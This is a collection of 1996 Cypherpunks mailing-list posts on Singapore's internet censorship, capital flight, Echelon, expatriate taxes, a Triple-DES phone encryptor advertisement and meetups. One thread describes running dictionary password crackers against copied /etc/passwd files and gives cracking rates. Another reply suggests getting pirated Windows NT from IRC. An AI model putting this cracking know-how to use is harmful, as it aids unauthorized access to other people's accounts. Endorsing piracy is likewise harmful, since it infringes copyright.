>Did anyone else catch the AP wire story
>(it ran here in the SF Chronicle on Thursday)
>about the Singapore government cracking
>down on "undesirable" (e.g., sex smut, anti-govt.
>postings etc.) content on web sites, usenet etc.
>Their basically forcing, by law, Singapore  ISPs to use
>proxy servers that contain the information
>that the govt. deems fit. 
>
>Scary if you ask me. But then they have a govt.
>that acts like it's the management of Disneyland.
>
>"Have a nice ride!"
>-B
>=====================================================
>Brendon Macaraeg
>http://www.itp.tsoa.nyu.edu/~brendonm 
>Finger macaragb@acf2.nyu.edu for my PGP Public Key
>
>
"Disneyland with the death penalty" To quote William Gibson.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMhXI9P+hzPlzwZAdAQFgNAgA0qjtwaCv+O8+Ye0OtCmxAzW0LBsXfRtK
1nZmbUqh5NIDHSviQrDDGEX1/Oajai1cpiCZtt3MbhlWUXWgzcbxOX2ZZDUA/4xc
4/TCBeRZ5lRfSnUeV0NhmLnrX4hgVuwMS+x0Z5LnkK0hg39GByMoiqM7MFJHKBQ3
PXTqSnGnNv+dDG1ZcClZff2JIAiNLHcxx8MOk60E9kLAPVYv2XAkID3FmuuHRS2G
6zPDe6Jlgs2tmCP8u5fQEnfaGYqQiUvfg8bqJt2x5BeMGJfY7Nbj0SureFZ7lQs6
/soG82FQkdUykewoOk+lnTJ3S3UY6am3GNwCFzPuMhfpuMizBzEF8g==
=RFbe
-----END PGP SIGNATURE-----
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 18 Aug 1996 03:25:00 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: Re: Imprisoned Capital
Message-ID: <199608171713.KAA21889@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


[In response the argument that attempts to imprison capital will cause 
capital flight]

At 10:50 PM 8/16/96 +-200, Bart  Croughs wrote:
> This is a good point when you talk about governments that will 
> prevent *all* capital from flowing out. But a government could 
> prevent the outflow of capital of it's own citizens, and still 
> allow capital of foreigners to leave the country. As long as 
> foreign capital isn't imprisoned, foreign capital could be 
> attracted.

Been tried.  Does not work.

1.  If foreign capital is allowed to freely enter and leave, internal
players find ways to sneak their capital out.  This forces the
government to start regulating and supervising foreign businessmen
in ways that at best terrify them (such controls look very much
like creeping confiscation), and at worst cause them huge harm
with no real benefits to anyone.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sat, 17 Aug 1996 21:09:12 +0800
To: cypherpunks@toad.com
Subject: any SF cpunks around next Sat?
Message-ID: <25922.9608170945@dart.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Living in the UK, I really don't have that much idea where the people
on the list I've gotten to know over the years live.

I will be over in the San Francisco / Redwood City area next Saturday
(24th), if anyone I know would like to meet, exchange keys, have a
chat about crypto/cypherpunks stuff, mail me.

Also if there is any regular cpunks meeting in this area which
coincides, let me know!

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 18 Aug 1996 03:10:16 +0800
To: cypherpunks@toad.com
Subject: Re: Protecting floating datahavens?
In-Reply-To: <199608170000.RAA08637@toad.com>
Message-ID: <v0300780aae3b8f84c7b2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:04 PM -0400 8/16/96, Bill Stewart wrote:
> There's also a Laissez-Faire City project, which proposes to lease a
> 10-mile-square chunk of land to rent from any cooperative third-world
> government for 50 years or so with a deal of local autonomy.
> It's much less threatening to the Old World Order than calling yourself
> a country, and you've got a government which is making money by
> leaving you alone that at least discourages the most likely invaders
> (itself, and the US) without having to provide much national defense.
> Who knows, maybe they'll actually do something, and rent a chunk of
> Costa Rica or Somaliland or whatever.

Along these lines, there was some comment in the latest Forbes billionaire list issue about a guy who's trying to do something like this in the Phillipenes. I don't think he's going the "total local autonomy" route, but he's definitely doing the Jack Kemp "enterprize" zone, no-tax-on-anything trick. 

However, as Black Unicorn has noted here before, the Phillipenes are the only other country besides the USofA where citizens are taxed any income you get, no matter where on earth you actually earn it. (An outcome of the Marcos expulsion, I think). Getting from those kinds of confiscatory laws to no taxes at all will be some mean trick. Given that the Phillipenes, "People Power" or no, could be charitably be called a plutocracy at best, and a cleptocracy at worst, I wish this guy luck. Him being a plutocrat himself may help. 

Not that I have anything against plutocrats, mind you. Want to be one myself, someday. Well, "pluto", anyway. I guess it's the "cracy" part of "plutocracy" that gets my undies in a bunch...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <gt4436c@prism.gatech.edu>
Date: Sun, 18 Aug 1996 01:33:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19960817152631.00ac0158@glc20.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 8/16/96 +0800, rednax wrote:
>Speaking of NT, I downloaded the full version of msie 3.0 the other day but
>when I tried installing it, an error message came up saying that it requires
>a Win95 or WinNT4.0 build of 1381 or higher. I am currently running NT 4.0b
>that has a build of 1314, does anyone know of where is the upgrade or
>service packs(if available)? I have tried looking around microsoft.com, but
>they neither provided any detail nor did they provide an e-mail.

Build 1381 is the final release of NT 4.0, not a beta version.  Build 1381 was
released to OEMs about a week and a half ago.  It should reach a retail outlet
near you before September.

There is no free upgrade from the beta version of NT 4.0 to the final version.
You may want to purchase a copy from Microsoft, or sit in IRC for a while and
wait for someone to hand it to you.


---
  Jeremy L. Mineweaser   | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
gt4436c@prism.gatech.edu | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y- 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ScottMorris <smorri59@icubed.net>
Date: Sun, 18 Aug 1996 01:32:26 +0800
To: cypherpunks@toad.com
Subject: Re: Unix passwd-cracker online?
Message-ID: <9608171527.AA26704@raptor.icubed.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 AM 8/17/96 -0700, you wrote:
>On Fri, 16 Aug 1996, Carlos L. Mariscal may have written:
>
>> person has obtained a specific password by entering the desired 
>> adresses'passord on a submnit form in a Web page.
>[deletia]
>> never have it if there really is such, but this came to my mind when i read 
>> the posts  on the plate-numbers-in-Oregon polemica. I would appreciate 
>
>Somehow I have a hard time believing this to be true.  I run crack, a
>password searching program that uses a dictionary as its base, on my
>/etc/passwd regularly to locate any users with easily guessed entries.
>With ultra fast crypt (UFC), the fastest crypt() replacement I can find, I
>can run through about 9700 passwords per second on this P6-150.
>[snip]

   You of course are assuming they are using a Unix box. I commonly offload
the etc/passwd file to my pc (p-100) and run Crackerjack against the file.
With a single username a 5 meg wordlist will run in about 30 seconds
(mileage will vary).
    The concept is certainly interesting and is another case for good
passwords. Of course you need to get the password file first which is
another story for another group.

>Sorry, I don't think this is feasable, or possible.

     While I believe this is possible feasable is another story.

>(Please do correct my calculations if errors are detected, especially if
>the corrected numbers make this possible.. it's getting late at night, and
>my mind is fogging up, so these calculations/estimates/wild guesses may be
>off more than usual. It does sound like an interesting project to
>undertake, if it were possible, but not on my equipment!)
>
>
>--    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
>William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
> fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
>PGP-encrypted mail welcome!           "640k ought to be enough

-----
Scott L. Morris			Systems Security Consultant
smorri59@icubed.net		Data Forensics
Finger smorri59@ally.ios.com for my pgp public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Sun, 18 Aug 1996 05:14:57 +0800
To: cypherpunks@toad.com
Subject: CS8191 data sheet and ordering info...
Message-ID: <199608171837.LAA20948@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Attached is the ascii version of the data sheet, followed by ordering
information.  Full protocol specifications will be available in about
2 weeks.

Eric

----------------------------------------------------------------

                Communication Security Corporation
            CS8191 Triple-DES Telephone Privacy Device

With the growing number of tools available to assist in wiretapping,
anyone using a telephone in the '90's is vulnerable to unwanted
eavesdropping. With many of today's standard technologies, anyone can
gain access to our most private of conversations. As a result, the
telecommunications industry has an increasing need for private, secure
voice communication devices. The Communication Security Corporation
has dedicated its resources to addressing this need by designing the
CS8191, our flagship product and the most secure telephone privacy
protection available.


Unsurpassed Security 
 
Truly open, encryption technology is at the heart of the CS8191
telephone security unit. With the press of a button, the CS8191 is
activated. Within seconds your conversation is kept secure from the
intrusion of any type of wiretapping.


Open-Standard Encryption  

How are you assured that your tele-security unit is really working to
protect your telecommunications? In truth, the "trust-us" proprietary
solutions used by competing products are an indication of weak privacy
protection. They "hide" from the user, the ability to verify proper
functioning of the unit.

Communication Security provides users with the best privacy protection
by incorporating leading-edge encryption technology that utilizes the
power of truly open standards. Our commitment to an open specification
allows sophisticated users the ability to "check under the hood" and
evaluate the security attributes of the system. 


Portable And Easy To Use 
 
The CS8191 has been designed to work with conventional analog
telephone systems (POTS). The unit connects between your telephone and
the wall, much like a telephone answering machine. Plug in the power,
and that's it. In "clear mode" your telephone continues to work as it
normally does. To begin an encrypted conversation, simply press the
'go secure' button and wait for the green light to come on. The system
is easy to use and compact, making it the perfect telephone security
solution for home, travel or office use.

 
Superior Performance 
 
* As a standard component, Communication Security has incorporated a
  leading-edge speech coder for clarity unsurpassed in secure telephone
  devices, to date.

* Voice clarity is virtually undisturbed whether the system is in secure
  or clear mode.   

* LED indicators on the unit let you know instantly that your call is being
  transmitted securely.   

 
Service And Support

The Communication Security Corporation provides a one year warranty for all
parts and labor. Upgrades are included in the price of the CS8191 and are
available under the terms of the warranty. 
  

For More Information

To get more information on securing your phone communications, send
email to info@comsec.com or call (707) 577-0409, fax (707) 577-0413.


Features			Benefits

* Open standard	encryption	Allows independent evaluation and
				verification of protocol and behavior

* Excellent speech quality	Superior clarity is assured with leading-edge
				speech coder as a standard component

* Auto Secure			Allows for secure, unattended
				operation for all-hours data protection

* Small size and weight		Makes the CS8191 the perfect solution for
				secure home, office or travel telephone
				communications

Specifications:

 Modem

 * ITU V.32bis (14,400 bits/sec)

 Interfaces

 * Two buttons (Go Secure, Go Clear)

 * Two LEDs (Secure, Clear)

 * External power supply

 * Two modular phone jacks
 
 Power

 * Input voltage: 110 volts AC, 50-60 Hz.
 
 Approvals

 * FCC, part 15 and 68

 Warranty

 * 12 months parts and labor

 Software Upgrades

 * One year of upgrades included in purchase price

 Voice Nodes

 * Clear voice

 * Secure voice 

 Secure Mode Speech Compression

 * International standard GSM 06.10 full rate speech transcoding 
   (13,000 bits/sec)


Notes:

 * Specifications subject to change without notice.

 * Government regulations apply for export license.

 * Completing the circle of secure communication requires the receiving
   end of your call to also have a CS8191 unit connected to their phone.


Cryptographic Details:

* Unique session key generated for each conversation using Diffie-Hellman
  exponential key exchange (2048 bit modulus) (U.S. Patent No. 4,200,770
  licensed by Cylink Corporation)

* Defense against "man in the middle" active attack using interleave
  protocol combined with voice verification of six digit key name derived
  from the public exponentials

* Hardware Random number generator based on Johnson noise

* Three Key Triple-DES (168 bit key), operating in modified counter mode.
 
* No back door, "Key-Escrow" or GAK

* Open standard. Full protocol specifications available.


Communication Security Corporation
1275 Fourth St. Suite 194  Santa Rosa, CA 95404
Tel: 707-577-0409  Fax: 707-577-0413
info@comsec.com 


----------------------------------------------------------------

     Yes,  I want real telephone privacy protection!


Send me ________ CS8191's at $995.00 each:      $____________

Shipping and Handling:				$_______10.00

California residents add sales tax:		$____________

Total:						$____________


I'm paying with Check or M/O ____  Visa / MC ____

Name on Card:______________________________

Card Number:_______________________________

Exp. Date:__________


Ship To:


_________________________________________


_________________________________________


_________________________________________


__________________________________________



Allow 6-8 weeks for delivery.


I am a US citizen or "Lawful Permanent Resident"   Yes____   No____


Make checks payable to: Communication Security Corp.

Mail or fax this order form to:

	Communication Security Corp.
	1275 Fourth St., Suite 194
	Santa Rosa, CA 95404
	v: 707-577-0409
	f: 707-577-0413






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent L. Diaz" <vldiaz@adnc.com>
Date: Sun, 18 Aug 1996 04:46:29 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Software manpower exports and the power of governments
Message-ID: <2.2.16.19960817114626.24776196@mail.adnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:17 PM 8/17/96 +0600, you wrote:
>In the case
>of Coke, I can understand the government not wanting to spend
>precious foreign exchange on sugared water in a country where
>there is a serious shortage of drinking water. Tim made the
>perfectly valid point that such decisions cost the country in
>reputation, but the Indian government doesn't mind loss of
>reputation in matters it firmly believes in, as in the current CTBT
discussion. 

There is a central point here that you are missing. Many of us here believe
in the absolute, sovereign freedom of the individual. 

Governments should only be minimally involved with the earning of
individuals. Control over the distribution of currency abroad, (i.e. foreign
exchange controls) is definitely not one of them.

As I understand the story of Coke in India, New Delhi was bent, among other
things, on stealing proprietary information, (i.e. the formula for Coke)
from the company. In short, they told Coke that they could stay only on
condition that the formula was turned over to New Delhi.

Yes, they cloaked their proposed theft in high sound nationalistic tripe,
however it was nothing but a blatant attempt to steal what was not theirs.

I do not claim a complete knowledge about the availability of fresh water on
the Indian Sub-Continent. But I would be willing to wager that lack of
progress in this area was severely hampered due to the typical, Statist
meddling of the Indian government in the lives of its own people.

It is immoral for any government to interfere in the personal choices of
free men and women. If any person wishes to partake of a high quality, and
probably locally expensive soft drink in preference to either local brands
or water, scare or not, such a choice should be left to them, not to an
Collectivist cabal of bureaucrats. 

What the Socialist Governments of India have never comprehended is that a
government intent on doing you good is capable of doing you out of
everything you own!

Simplistic? Yes......simplicity is one of freedom's chief virtues. 






Regards,

VINCENT L. DIAZ
U-SAVE COMMUNICATIONS
Business Line: 619-277-2411
Fax Line:         619-277-0298
http://www.cognigen.com/agencies/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carlos L. Mariscal" <clopez@nayar.uan.mx>
Date: Sun, 18 Aug 1996 03:58:18 +0800
To: William Ono <wmono@Direct.CA>
Subject: Re: Unix passwd-cracker online?
In-Reply-To: <Pine.LNX.3.94.960817000216.1458B-100000@crash.direct.ca>
Message-ID: <Pine.SUN.3.91.960817120330.9586A-100000@aramara.uan.mx>
MIME-Version: 1.0
Content-Type: text/plain



	Well, as for William's calculations, my ideas have been 
confirmed. What I still think may be possible is a fast search on 
/etc/passwd for blank entries or Obvious (login name, reverse login name, 
etc) password entries, right? Still, ik think it would be fairly illegal; 
not assuming EVERYthing on the net is 100% legal...


	thanx Will

    __       
    ||     
   ====         'If you can dream of it
   |  |__       then you can manage it'
   |  |-.\     
   |__|  \\         clopez@nayar.uan.mx
    ||   ||         
  ======__|     
 ________||__   
/____________\   Carlos L. Mariscal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sun, 18 Aug 1996 05:18:33 +0800
To: Scott Schryvers <brendon@home.net (Brendon Macaraeg)
Subject: Re: proxy servers in Singapore
In-Reply-To: <199608171424.JAA26755@sr.radiks.net>
Message-ID: <9608171227.TE25432@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Did anyone else catch the AP wire story
> >(it ran here in the SF Chronicle on Thursday)
> >about the Singapore government cracking
> >down on "undesirable" (e.g., sex smut, anti-govt.
> >postings etc.) content on web sites, usenet etc.
> >Their basically forcing, by law, Singapore  ISPs to use
> >proxy servers that contain the information
> >that the govt. deems fit. 

A copy of the regulations is available from
http://www.gov.sg/sba/netreg/regrel.htm

One of the providers in Singapore (singnet) has the following 
page up about the proxy server that Singnet customers will be forced
to use
http://www.singnet.com.sg/cache/sbareg.html

Scary stuff. But pretty much everything I hear about Singapore is
pretty scary.

I'm wondering if they'll implement this by blocking direct 
connectivity from their customers machines for TCP with the 
destination ports commonly used by http, ftp, etc. thus allowing 
people to do things not supported by the proxy and to get around the 
blocking pretty easily, or if they'll just block all direct IP 
connectivity between their customers and the rest of the Internet, so 
people in Singapore will be reduced to viewing the Internet as 
nothing more than the WWW. 


-- 
Mark Henderson -- mch@squirrel.com, henderso@netcom.com, markh@wimsey.bc.ca
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Sun, 18 Aug 1996 03:01:44 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: "world communications being monitored"
Message-ID: <199608171646.MAA01774@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:44 PM 8/16/96 -0700, Vladimir Z. Nuri wrote:
>
>------- Forwarded Message
>From: "Mat Guthrie" <matguthrie@enterprise.net>
>To: mmlist-l@newciv.org
>Date: Wed, 14 Aug 1996 20:14:39 +0000
>Subject: All Int' Communications Are Monitored
>
>
>- - ->  SearchNet's   snetnews   Mailing List
>
>Hi there all,
>
>I heard an amazing news report on the radio today, that confirmed
>what I've heard and suspected for a long time - all international
>communications *are* continually being monitored!!

    No, what this guy heard was a book report. I don't know how
well a writer Mr. Hager is but if he doesn't have proper documentation
then he confirms nothing. 

>
>The report was on "The World at One" news report on BBC Radio 4 -
>about as respected, reliable and informative a source as any
>mainstream media is ever likely to be. The feature spoke about a
>book that's come out in New Zealand called "Secret Power" by Nicky
>Hager, that has been endorsed by the former (?) Prime Minister of New
>Zealand himself. It supposedly goes into great detail about an
>international agreement called "Echelon" of which the US, UK,
>France, New Zealand, Australia and several other nations are all
>participants. According to Nicky Hager - who was interviewed on the
>program - a system of monitoring stations have been set up in various
>countries in the world that continually monitor ALL fax, email,
>telephone and satellite communications etc, "sniffing" for keywords
>using super computers. When these key words are identified the
>information is automatically logged and according to Hager, sent
>directly to the US intelligence services.
>
>Now whilst many of us have undoubtedly come across this sort of
>information before and undoubtedly many of us have probably scoffed
>at such ascertions as merely impossible and blatantly paranoid,
>something very significant sets this report apart. Before the book
>was published, Hager went with his manuscript to the New Zealand
>Prime Minister who had been responsible for signing NZ up to the
>agreement (I got the impression that he is no longer in power). 

    If anyone cares to look up the political history of the western
Pacific rim, it would seem very suspicious that N.Z and Australia would
have any intelligence commitment with France at all.



>Anyway, the PM was so shocked by the revelations that the book 
>contained, that he has written the forward to the book. Supposedly he 
>says that he had no idea of the true nature of the agreement and the 
>powers which it bestowed on the intelligence services and is 
>obviously trying to distance himself from the storm that's beginning 
>to brew up about it. Maybe he's just covering his arse or maybe he 
>was just another puppet head of government who wasn't properly 
>informed about what was really taking place in his own country, but 
>either way, the fact that he has got involved with the book adds 
>considerable credibility to it's claims.

    If the PM has no credibility (his saying he knew nothing) how does
his input add credibility to the book?



 Those of you who have often 
>said that such wide-scale monitoring is "obviously impossible" might 
>be wise to re-evaluate your positions!
>

    Those of us in-the-know won't be reevaluating anything. Save your
money and wait for the book to get into the local library. Better to
spend your money on David's book on Enigma.


Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sun, 18 Aug 1996 04:18:15 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB8C73.39F4E8E0@groningen12.pop.tip.nl>
Message-ID: <32160AF1.3B14@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


A fan's notes:

Bart Croughs wrote in one enormously long line:
> ...

Mr. Croughs, would you *please* have someone help you locate the 
"Return" key on your keyboard, and then press it every once in a
while?

> ... better arguments (after reading the books I suggested)

Like what is it with you and these books?  Is "Austrian" a code word
for "Divine omniscient extraterrestrial super-being"?

Through all this sophist gibberish I've completely lost track of
what exactly it is you're trying to say.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 18 Aug 1996 06:15:11 +0800
To: cypherpunks@toad.com
Subject: Ad Hoc Bay Area Cypherpunks Thing--Sat., 24 Aug, 3 pm, Menlo Park
Message-ID: <ae3b79331402100447b0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 AM 8/17/96, aba@atlas.ex.ac.uk wrote:
>Living in the UK, I really don't have that much idea where the people
>on the list I've gotten to know over the years live.
>
>I will be over in the San Francisco / Redwood City area next Saturday
>(24th), if anyone I know would like to meet, exchange keys, have a
>chat about crypto/cypherpunks stuff, mail me.
>
>Also if there is any regular cpunks meeting in this area which
>coincides, let me know!

(I passed this message by Adam Back, and he can make this schedule. So,
here it is. Unless serious objections are raised--e.g., a conflict with
another party--I suggest we do this.)

There is no Cypherpunks event scheduled for that Saturday, but we can have
an ad hoc gathering, informally arranged. I suggest meeting at 3 p.m. at
Cody's Bookstore, on El Camino Real in Menlo Park (hard to miss). Or at the
coffee shop next to it...either should be sufficient Schelling points to
nucleate a group.

>From there we can adjourn to someplace for food.

This should be close enough (a few miles) from Redwood City...a lot closer
for Adam that the 50 miles for me. But I always need good excuses to visit
the Valley.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Nygren <success@netcom.ca>
Date: Sun, 18 Aug 1996 07:02:14 +0800
To: cypherpunks@toad.com
Subject: signoff cypherpunks
Message-ID: <2.2.32.19960817211326.0068ba48@netcom.ca>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <cypherpunks-errors@toad.com>
>Received: from toad.com by tor-srs2.netcom.ca (8.7.5/SMI-4.1/Netcom)
>	id TAA12781; Fri, 16 Aug 1996 19:38:39 -0400 (EDT)
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id KAA07516
for cypherpunks-outgoing; Fri, 16 Aug 1996 10:30:44 -0700 (PDT)
>Received: from soleil.mnet.fr (root@soleil.mnet.fr [194.51.151.1]) by
toad.com (8.7.5/8.7.3) with SMTP id KAA07511 for <cypherpunks@toad.com>;
Fri, 16 Aug 1996 10:30:35 -0700 (PDT)
>Received: from linux (ppp03.mnet.fr [194.51.151.26]) by soleil.mnet.fr
(8.6.11/8.6.9) with SMTP id TAA21252 for <cypherpunks@toad.com>; Fri, 16 Aug
1996 19:29:49 +0100
>Message-ID: <3214BCA6.6ED8124F@mnet.fr>
>Date: Fri, 16 Aug 1996 13:23:34 -0500
>From: Arnauld Dravet <scraver@mnet.fr>
>X-Mailer: Mozilla 3.0b6 (X11; I; Linux 2.0.0 i586)
>MIME-Version: 1.0
>To: cypherpunks@toad.com
>Subject: signoff cypherpunks
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>signoff cypherpunks
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 18 Aug 1996 05:22:12 +0800
To: cypherpunks@toad.com
Subject: US Taxes on X-Pats
In-Reply-To: <Pine.LNX.3.91.960817152032.21032A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960817152107.21014B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga <rah@shipwright.com>
> However, as Black Unicorn has noted here before, the Phillipenes are the
>only other country besides the USofA where citizens are taxed any income
>you get, no matter where on earth you actually earn it.

It is not exactly that bad if you are outside the USA. I got ahold of the
IRS codes on this before I left the USA (so about 2 years ago).  The rule
then was that the first $70,000 you earned was tax free if you were
outside the USA for 330 days or more of the year.  From another x-pat in
Anguilla I heard that the $70 K had been increased. 

If you live outside the USA and have a corporation outside the USA, you
might prefer that the corporation buy a company yacht rather than pay you
more than $70 K.  And at least on this tropical island, $70,000 tax free
would go a very long way. 

It is true that if you are getting dividends and interest on your fortune
that moving outside the USA won't help, unless you get rid of your 
US citizenship.  And the USA wants you to pay capital gains on your
fortune as if you sold everything for cash right before you got rid of
your US citizenship.  So it seems best to get rid of it before you
are really rich.  :-)

   --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sat, 17 Aug 1996 23:47:37 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8C51.A4B84540@groningen12.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Scott McGuire wrote:

> Bart  Croughs wrote:
>
>>You haven't answered this question yet. I don't claim that the U.S. is
>>worse off when US capital moves abroad. I only ask: how can you proof
>>that the US isn't worse off when US capital moves abroad? 

>I recall you were interested in how the Austrians would answer this.  I
>think that they would object to the question because of their aversion to
>aggregates.  Some individuals are better off and some worse off.  The
>Austrians would deny that you can sum the results for individuals and get
>a result for the economy as a whole.  This is because of Austrian
>subjectivity.

>Assume that I move a programming job to India, and make the required
>capital investments.

>I am presumably better off (otherwise I wouldn't have moved the capital).

>The worker I fire here in the US is worse off.

>(Other effects you have mentioned go here).

>Now, considering only me and the laid off worker, is this change overall
>good or bad?  To answer this, you would have to compare the value of my
>gain to the value of the workers loss.  But you can't.  Value is
>subjective.  And, it only gets harder when you try to take into account
>the other people affected.

You are absolutely right here. I should have asked: 'how can you prove that *US workers* aren't worse off' instead of 'how can you prove that *the US* isn't worse off'. I abbreviated my question because I had repeated it already so often. My misstake.
	You seem to be saying that the US workers are worse off when American capital is invested abroad (something that most of the other posters have denied), but that American consumers and investors are better off, and that it's impossible to say what the overall effects on the standard of living of American citizens will be because you can't add and substract values of different people. This sounds reasonable (and indeed very Austrian), and you could be right, though I think there exists a proof that the overall effects on the standard of living of American citizens of investing abroad is positive. See one of my recent posts on the subject.

Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 18 Aug 1996 05:56:32 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches (fwd)
In-Reply-To: <199608170314.WAA11946@einstein>
Message-ID: <Pine.SUN.3.94.960817151658.4248A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, Jim Choate wrote:


[Constitutional Arguments Deleted]

> > And, I might add, there is a different standard for voice communications
> > however carried.  The heat from a indoor pot garden is a different matter,
> > and incidently, the matter on which the question was presented.
> 
> I have to disagree. The issue is not what is being carried on the medium but
> rather can I measure that medium without a warrant if I am a officer of the
> court or empowered by law as the police. Implicit in this question is the
> fact that my goal is to gather information to be presented to a court for
> legal action against the party being monitored. This was a strawman that the
> court fell for, the defence attorney didn't understand the technology either.
>
> To argue that if I measure some quantity and no modulation is present I may
> present that as evidence, but if modulation is present then I need a warrant
> to even measure it is ludicrous and screams 'alterior motive'. I would say
> that the argument of the state of the light (ie on/off) is modulation and
> therefore may be extended to limit unwarranted measurement.

Then one reaches the absolutely unteniable position that the light
reflected off the criminal while he shoots the victim 5 times in the chest
in cold blood cannot be intercepted by a law enforcement officer (or if we
extend your citizen = law enforcement officer analogy, also a citizen)
without a warrant.
 
> So, all I need to do is to modulate the IR lamps with a commen radio. Then
> they can watch all they want with cameras and such. No warrant, no evidence.
> Do you figure X-10 modulation would qualify? Wouldn't the on/off caused by
> the AC power qualify as modulation of the light?

The crux of the argument is the "expectation of privacy" reasoning laid
